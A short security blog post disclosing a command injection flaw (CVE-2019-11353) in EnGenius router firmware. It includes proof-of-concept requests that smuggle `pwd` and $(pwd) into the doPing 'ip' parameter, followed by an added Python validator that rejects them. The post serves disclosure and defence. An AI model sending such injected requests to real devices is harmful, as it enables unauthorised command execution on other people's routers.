Hello, from the other side of the ether!
Just making a quick post to briefly highlight an arbitrary code execution flaw in an EnGenius router. You can find more information regarding this flaw below:
CVE Founder: Max Segura
Version: Firmware 2.0.284
Vulnerability: Arbitrary Code Execution
Fix Discovered: 4-15-19 on ticket #12727
National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2019-11353
It is important to note that this flaw affects the version noted above, but could potentially affect other versions, except the latest version of 126.96.36.199 that is currently available. If you are a business using this type of device, you are encouraged to visit the EnGenius main website at https://www.engeniustech.com/engenius-firmware-updates.html to keep your products up to date.
Remember to test responsibly and only on devices you own 🙂
Proof of Concept
This router supports a myriad of functions and utilities through BusyBox. Two utilities that the router uses are ping and traceroute. These can be abused to run alternate commands by using `` (backticks) or $().
`` and $() are enabled functions on the router’s core operating system that allow command substitution: a command placed inside them is evaluated within another command.
Here are requests demonstrating how you can alter what is sent to the router and then see the output on the page.
GET /cgi-bin/luci/;stok=881c7d2ca114c987a08ea8707aabd826/html/doPing?ip=`pwd`&size=64&num=4&addresstype=ipv4&t=1554749403990 HTTP/1.1
You can also send the following using $():
GET /cgi-bin/luci/;stok=881c7d2ca114c987a08ea8707aabd826/html/doPing?ip=$(pwd)&size=64&num=4&addresstype=ipv4&t=1554749403990 HTTP/1.1
This flaw was fixed on firmware version 188.8.131.52; please be sure to check the link above to upgrade your devices.
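An added example, not from the original post and not EnGenius's code: one way a diagnostic handler can treat the doPing parameters so that both requests above are rejected before any command is built. The function names, the numeric bounds, the stok placeholder and the ping/ping6 argv layout are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Allowlists (assumed policy): address literals without scope IDs, and
# RFC 1123 hostname labels. fullmatch() avoids the "$ matches before \n" trap.
_ADDR = re.compile(r"[0-9A-Fa-f:.]+")
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")
_NUM = re.compile(r"[0-9]{1,4}")


def valid_target(value, addresstype="ipv4"):
    """Return a safe ping target string, or None if the value is rejected."""
    if _ADDR.fullmatch(value):
        try:
            addr = ipaddress.ip_address(value)
        except ValueError:
            addr = None
        if addr is not None:
            want = 4 if addresstype == "ipv4" else 6
            return str(addr) if addr.version == want else None
    # Hostname fallback: no shell metacharacters and no leading hyphen,
    # so the value cannot be read as a command or as an option.
    if len(value) <= 253 and all(_LABEL.fullmatch(p) for p in value.split(".")):
        return value
    return None


def build_ping_argv(request_target):
    """Map a doPing request target to an argv list, or None to reject it."""
    q = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    get = lambda key, default: q.get(key, [default])[0]
    addresstype, size, num = get("addresstype", "ipv4"), get("size", "64"), get("num", "4")
    if addresstype not in ("ipv4", "ipv6"):
        return None
    target = valid_target(get("ip", ""), addresstype)
    if target is None or not (_NUM.fullmatch(size) and _NUM.fullmatch(num)):
        return None
    if not (1 <= int(size) <= 1472 and 1 <= int(num) <= 10):  # assumed bounds
        return None
    # An argv list is meant for an exec-style call with no shell in between.
    binary = "ping" if addresstype == "ipv4" else "ping6"  # assumed applet names
    return [binary, "-c", str(int(num)), "-s", str(int(size)), target]


if __name__ == "__main__":
    base = "/cgi-bin/luci/;stok=PLACEHOLDER/html/doPing?size=64&num=4&addresstype=ipv4&ip="
    for ip in ("192.168.1.1", "`pwd`", "$(pwd)"):  # last two: payloads from the post
        print(repr(ip), "->", build_ping_argv(base + ip))
```

The same target check applies to the traceroute utility mentioned above, since it takes the same kind of parameter.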
Until next time,